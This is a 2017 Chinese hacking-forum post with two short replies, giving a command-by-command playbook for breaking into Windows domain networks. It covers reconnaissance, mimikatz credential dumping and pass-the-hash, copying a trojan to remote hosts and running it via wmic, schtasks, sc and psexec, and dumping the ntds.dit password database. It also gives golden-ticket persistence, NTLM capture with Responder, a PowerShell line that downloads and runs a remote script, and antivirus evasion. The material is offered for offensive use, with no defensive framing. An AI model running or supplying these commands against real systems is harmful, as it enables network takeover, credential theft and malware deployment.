搜索
查看: 1080|回复: 2

windows内网渗透杂谈

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-4-25 17:11:11 | 显示全部楼层 |阅读模式
域渗透
  • 域信息收集
  • 获取域权限
  • dump域hash
  • 权限维持
工作组渗透
  • 常规内网渗透
  • 各种欺骗攻击

域渗透域信息收集0x01

查询当前域信息
  1. net view /domain
  2. net config workstation
  3. net group "Domain Admins" /domain
  4. net time /domain
  5. ipconfig /all
  6. nslookup xxx
  7. dsquery server

  8. 查看域控制器
  9. net group "Domain controllers"

  10. 查询所有计算机名称(windows 2003)

  11. dsquery computer

  12. 下面这条查询的时候,域控不会列出

  13. net group "Domain Computers" /domain
复制代码

还可以通过powershell进行信息搜集,收集的信息包括域控机器,网段信息,域内服务列表。使用powershell的话,首先要绕过默认的安全策略,具体看文章https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/


PowerSploit\Recon\PowerView.ps1


powerview Get-NetDomainController 收集域控信息 具体的可以看看powerview的帮助文件 域内服务信息收集,在域环境中其实无需做端口扫描。直接通过SPN进行信息收集,具体脚本
  1. PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices.ps1
复制代码



0x02域内权限获取
1.日常规服务,通过前面收集的服务信息,针对性跑这些服务。其中跑sqlserver弱口令比较好,跑出来了就可以执行命令。
2.抓密码 拿到一台域服务器后,首先加载mimikatz的powershell脚本将内置的信息抓取一遍,如果域管理员登录过的话,直接就获取到了域管权限。但是在windows2012后mimikatz抓不到明文了(包括打了KB2871997这个补丁的机器),只能通过修改服务器上面的一些设置来获取,有完整的powershell利用脚本。 https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed
3.pass the hash 抓到密码破不出来就只能pth了,可以使用mimakatz


  1. mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
复制代码



但是打了KB2871997这个补丁后常规的pth不能用了,只能传递administrator这个账号(sid=500),但是可以使用mimikatz任意传递aes256
4.steal token 当你获取了本地计算机的system权限后,如果这台机器上有域用户跑的进程,就直接可以窃取域账号的token,然后从本地用户组跨入域环境。如果这台机器上有域管的开的进程,那么直接steal token后就可以登录域控了。
5.远程执行命令方法
  1. copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件
复制代码

WMIC远程运行命令
  1. wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”
复制代码

powershell remoting 执行命令
schtasks计划任务远程运行
  1. schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe
  2. /sc once /st 00:00 /S host /RU System schtasks /run /tn foobar /S host
  3. schtasks /F /delete /tn foobar /S host ##清除schtasks
复制代码

SC添加服务远程运行命令
  1. sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ##新建服务,指向拷贝的木马路径
  2. sc \\host start foobar ##启动建立的服务
  3. sc \\host delete foobar ##完事后删除服务
复制代码

PStools 远程执行命令
  1. psexec.exe \\ip –accepteula -u username -p password program.exe
复制代码

PTH+compmgmt.msc

smb+MOF
smbexec远程执行命令
  1. copy execserver.exe \\host\c$\windows\
  2. test.exe ip user password command netshare
复制代码

不推荐使用pstools,因为会留下很多痕迹,日志要记录,并且如果禁用NTLM那么psexec无法利用获得的ntlm hash进行远程连接
6.ms14068 && GPP ms14068 可以通过先执行klist purge 然后在用mimikatz注入证书 这样域用户也可以直接使用这个漏洞。 GPP漏洞介绍 http://www.91ri.org/14909.html
0x03 dump域内hash
1.非交互式 QuarkPwDump离线分析 需要文件:ntds.dit system.hiv 导出 system.hiv
  1. reg save hklm\system system.hiv
复制代码

QuarksPwDump.exe -k 可以获取key
导出ntds.dit
连接到域控之后,上传bat 利用vshadow备份ntds.dit
  1. setlocal
  2. if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
  3. set SOURCE_DRIVE_LETTER=%SystemDrive%
  4. set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
  5. set DESTINATION_PATH=%~dp0
  6. @echo ...Determine the scripts to be executed/generated...
  7. set CALLBACK_SCRIPT=%~dpnx0
  8. set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
  9. @echo ...Creating the shadow copy...
  10. "%~dp0vshadow-2008-x64.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
  11. del /f %TEMP_GENERATED_SCRIPT%
  12. @goto :EOF
  13. :IS_CALLBACK
  14. setlocal
  15. @echo ...Obtaining the shadow copy device name...
  16. call %TEMP_GENERATED_SCRIPT%
  17. @echo ...Copying from the shadow copy to the destination path...
  18. copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%
复制代码

新建服务执行
  1. sc create backupntds binPath= "cmd /c start c:\windows\temp\ntds.bat"
  2. sc start backupntds
  3. sc detele backupntds
复制代码

导出HASH
  1. QuarksPwDump.exe -dhd -nt ntds.dit -sf system.hiv -o hash.txt
复制代码

ntdsutil导出
  1. ntdsutil snapshot "activate instance ntds" create quit quit
  2. ntdsutil snapshot "mount {GUID}" quit quit
  3. copy MOUNT_POINT\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
  4. ntdsutil snapshot "unmount {GUID}" quit quit
  5. ntdsutil snapshot "delete {GUID}" quit quit
复制代码

powershell 导出ntds.dit
  1. powershell IEX (New-ObjectNet.WebClient).DownloadString( 'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1');Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\Users\Administrator\Desktop\ntds.dit"
复制代码

powershell导出后需要修复一下
  1. esentutl /p /o ntds.dit
复制代码

  • 交互式
导出ntds.dit
windows2008之后可以使用ntdsutil
0x04权限维持
  • golden ticket golden ticket 四要素
  1. user 用户名
  2. domain 域完整名称
  3. sid   获取方式:whoami /all  powerview 里面的  Convert-NameToSid ESRINEA\administrator   psgetsid  -accepteula ESRINEA\administrator (PStoos存在)   mimikatz SID::lookup name
  4. krbgt ntml hash   mimikatz “@lsadump::dcsync /domain:域完整名称 /user:krbtgt"
复制代码

保存golden ticket
  1. mimikatz kerberos::golden /user:administrator /domain:ESRINEA.LOCAL /sid:S-1-5-21-2609584263-878513794-3710365111-500 /krbtgt:EDC094659D9C18F4E320C70838404D43 /ticket:ESRINEA.LOCAL.kirbi
复制代码

使用golden ticket
  1. mimikatz keberos::ptt ESRINEA.LOCAL.kirbi
复制代码

工作组渗透常规内网渗透
  • 日服务
  • pass the hash
各种欺骗攻击
https://github.com/SpiderLabs/Responder 撸下内网一个网站挂上<img src=\\xxx\\xx>然后执行下面命令,就可以抓取ntlmv2 hash
  1. ./Responder.py -I eth0 -rPv
复制代码

SMBRelay Attack

impacket


cobaltstrike工具免杀
cobaltstrike+veil


from:https://bl4ck.in/penetration/201 ... 9D%82%E8%B0%88.html


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了

0

主题

23

帖子

99

积分

我是新手

Rank: 1

积分
99
发表于 2017-4-27 19:36:21 | 显示全部楼层
总结的很详细,pwdumps抓取的很详细

0

主题

3

帖子

9

积分

我是新手

Rank: 1

积分
9
发表于 2017-5-1 15:24:29 | 显示全部楼层
牛逼啊!很好的一篇文章。
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表